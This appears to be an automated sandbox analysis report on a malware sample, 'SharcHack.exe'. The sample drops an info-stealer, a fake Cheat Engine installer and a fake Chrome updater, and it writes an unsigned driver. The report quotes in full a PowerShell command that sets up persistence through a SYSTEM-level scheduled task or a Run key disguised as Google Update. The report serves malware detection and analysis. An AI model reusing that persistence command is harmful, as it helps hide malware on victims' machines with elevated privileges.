Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll

Source: C:\Users\user\Desktop\SharcHack.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Accept
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Accept
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Accept
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Automated click: Next

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Directory created: C:\Program Files\Google\Libs
Source: C:\Windows\System32\cmd.exe	Directory created: C:\Program Files\Google\Libs\g.log

Source: SharcHack.exe

Static file information: File size 41879040 > 1048576

Source: SharcHack.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x27ee400

Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: v2.exe, v2.exe, 00000007.00000002.2187180994.0000000005992000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :.pdbSH source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Github\zbShield-Utils-CPP\zbShieldUtils\bin\Release\zbShieldUtils.pdb source: CheatEngine75.tmp, 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.Linq.2010\Release\System.Data.SQLite.Linq.pdb source: VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr
Source:	Binary string: .pdbSHA2562$ source: VegaStealer_v2.exe, 00000005.00000003.2037815646.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb` source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BouncyCastle.Crypto.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.pdb source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.EF6.2010\Release\System.Data.SQLite.EF6.pdb source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Crypto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdb source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2010\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdb source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdbSHA256$ source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BouncyCastle.Crypto.pdb source: v2.exe, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2010\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :.pdb source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }

Source: Newtonsoft.Json.dll.5.dr

Static PE information: 0xA7D0BC1F [Fri Mar 21 12:18:39 2059 UTC]

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BBDF76D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_6BBDF76D

Source: 3.exe.0.dr	Static PE information: section name: .xdata
Source: CheatEngine75.exe.0.dr	Static PE information: section name: .didata
Source: updater.exe.2.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69B299156 push rbx; retf	2_2_00007FF69B299157
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69B299177 push 4B4BA300h; ret	2_2_00007FF69B299183
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBD7B85 push ecx; ret	7_2_6BBD7B98
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_02CC8088 pushad ; iretd	7_2_02CC8169
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_02CC816A push esp; iretd	7_2_02CC8171
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_02CCCFA0 pushad ; ret	7_2_02CCCFB6
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B600C2D push ecx; ret	8_2_6B600C40

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\v2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-L3QGH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	File created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\SharcHack.exe	File created: C:\Users\user\AppData\Local\Temp\3.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\SQLite.Interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SharcHack.exe	File created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2 (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll	Jump to dropped file
